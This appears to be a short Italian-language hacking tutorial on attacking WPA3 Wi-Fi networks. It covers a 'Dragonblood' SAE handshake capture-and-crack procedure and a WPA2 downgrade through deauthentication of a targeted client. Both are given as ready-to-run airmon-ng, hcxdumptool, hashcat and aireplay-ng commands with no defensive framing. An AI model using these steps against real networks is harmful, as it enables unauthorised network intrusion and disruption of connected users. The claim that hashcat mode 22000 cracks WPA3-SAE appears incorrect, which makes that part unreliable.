tags: WPA3_Hacking WPA3 DragonBlood WPA2_Downgrade
Attacco Dragonblood
Obiettivo: sfruttare le vulnerabilità dell’handshake SAE (Simultaneous Authentication of Equals), chiamato anche Dragonfly Handshake, per ridurre la sicurezza della chiave e facilitarne il cracking.
#Imposta la modalità monitor
airmon-ng start wlan0
#Usa hcxdumptool per intercettare le richieste di autenticazione SAE:
hcxdumptool -i wlan0mon -o wpa3_sae.pcapng -m <BSSID> --enable_status=1
#Usa hcxpcapngtool per estrarre l'hash dell'handshake:
hcxpcapngtool -o sae_hash.txt wpa3_sae.pcapng
#Lancia Hashcat con il modello specifico per WPA3-SAE (hash type 22000):
hashcat -m 22000 sae_hash.txt /usr/share/wordlists/rockyou.txtLa procedura di attacco è praticamente identica a quella per l’attacco PMKID (ovviamente sotto al cofano succedono cose molto diverse), l’unica differenza della procedura è l’utilizzo di hashcat che utilizza il codice 22000 al posto del 16800.
Attacco di Downgrade a WPA2
Obiettivo: forzare un dispositivo a connettersi con WPA2 invece di WPA3, rendendo possibile un attacco classico PMKID o 4-way handshake.
#Metti la scheda in modalità monitor:
airmon-ng start wlan0
#Scansiona le reti disponibili:
airodump-ng wlan0mon
#Identifica il MAC del client connesso alla rete WPA3:
airodump-ng -c <canale> --bssid <BSSID> wlan0mon
#Esegui un attacco di deautenticazione per scollegarlo dalla rete WPA3:
aireplay-ng -0 10 -a <BSSID> -c <MAC_CLIENT> wlan0mon
Il client, se il router è configurato per supportare WPA2, si riconnetterà utilizzando WPA2.